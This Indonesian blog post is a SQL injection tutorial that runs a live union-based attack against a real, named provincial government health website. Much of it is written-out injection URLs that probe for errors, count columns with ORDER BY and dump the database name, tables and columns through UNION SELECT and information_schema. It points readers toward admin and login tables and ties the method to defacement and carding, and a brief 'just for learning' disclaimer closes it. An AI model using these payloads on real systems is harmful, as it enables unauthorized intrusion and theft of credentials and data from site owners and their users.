SQL Injection (Apa Sih Sql Injection Itu ? Dan Bagaimana Cara Mengeksekusinya)

0
548

Assalamu’alaikum

Semakin banyaknya website-website didunia ini belum tentu semua website itu aman dan tidak bisa untuk di hack atau semacamnya.
nahh disini saya akan menjelaskan sedikit salah satu metode hacking jadul tapi masih ampuh sampai sekarang, metode ini adalah dasar atau awal dari berbagai macam serangan seperti deface maupun carding.
ok langsung aja masuk ke penjelasan apa itu SQL Injection menurut suhu kita Wikipedia

Structured Query Language (SQL) adalah sekumpulan perintah khusus yang digunakan
untuk mengakses data dalam database relasional. SQL merupakan sebuah bahasa
komputer yang mengikuti standar ANSI (American Nasional Standard Institute)
yang digunakan dalam manajemen database relasional.

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client
dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang
didalamnya menggunakan database untuk penyimpanan data.

SQL Injection terbagi atas beberapa jenis :
1). Union Based SQL Injection : Get Methode, Post Methode
2). Blind Based SQL Injection : Blind SQL Injection, Time SQL Injection
3). Error Based SQL Injection : Get Methode, Post Methode

SQL Injection bisa dilakukan dimana saja,
bisa saja dalam sebuah parameter, dalam kolom pencarian, di page login

Ciri Ciri website yang memiliki celah SQL Injection adalah, apabila
jika ditambahkan tanda ‘ (string) atau ” (quote) atau – pada parameter, maka content
yang ada pada parameter tersebut akan hilang / rusak
contoh :
www.target.com/berita.php?id=5 > terlihat normal
www.target.com/berita.php?id=5′ > content gambar hilang atau muncul kata kata
“You have an error in your mysql syntax”
dan log error yang lain.

Banyak web pemerintahan yang masih mempunyai celah dari SQL Injection, ini membuktikan
bahwa SQL Injection masih sangat berbahaya. Bahkan banyak orang yang bilang kalau
teknik ini disebut “Old But Gold” (Cara lama, tetapi efektif)

Lalu bagaimana si attacker mendapat data username & password ?
langsung aja live inject pada sebuah situs pemerintahan:
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan.html > Normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’.html > Error, Content hilang

lalu kita tampilkan dan urutkan kolom yang ada pada database tersebut
dengan perintah “Order By”

http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 5–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 6–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 7–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 10–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 11–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 15–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 17–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 19–+.html > normal
http://dinkes.sumutprov.go.id/hal-tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ order by 20–+.html > error

Berarti data dalam database tersebut sebanyak 19 kolom,
lalu kita liat isinya dengan perintah “Union select” dan tambah kan karakter –
sebelum parameter, menjadi

http://dinkes.sumutprov.go.id/hal–tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19–+.html

maka akan muncul beberapa angka pada content yang error tersebut,
misalnya saja pada web ini muncul angka 2 dan 4, berarti database tersebut terletak
pada kolom 2 dan 4

lalu kita liat isi database tersebut, misalnya saja nama database,

http://dinkes.sumutprov.go.id/hal–tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19–+.html

lanjut melihat table pada database tersebut dengan perintah
“Group_concat(), concat_ws(), dan lain nya ”

menjadi :
http://dinkes.sumutprov.go.id/hal–tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’ union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()–+.html

nah muncul kan nama table nya ? untuk lebih lengkap melihatnya, view-source saja
lalu cari table yang berhubungan dengan kata users,admin,login,member

berhubung diweb ini tidak ada table dengan nama users,admin,login,member,
kita ambil contoh saja, kita liat isi dari table agenda
perintah nya menjadi :

http://dinkes.sumutprov.go.id/hal–tugas-pokok-dan-fungsi-bidang-bina-pelayanan-kesehatan’%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns%20where%20table_name=0x6167656e6461–+.html

pada perintah ini table_name=0x6167656e6461

0x6167656e6461 = Apa maksudnya ? apa ini ?

0x6167656e6461 : adalah bentuk hexa dari nama table yang akan dilihat
jadi = 0xtbl_admin, kita harus mengubah nama table tersebut kedalam bentuk hexadesimal,
jika tidak maka tidak akan terbaca

Sekian cara bagaimana mengeksekusi SQL Injection, REMENBER!!! this is just for learning, not for personal pleasure or for profit
Hacking Is Art
By: Syiffa

Tinggalkan Balasan

This site uses Akismet to reduce spam. Learn how your comment data is processed.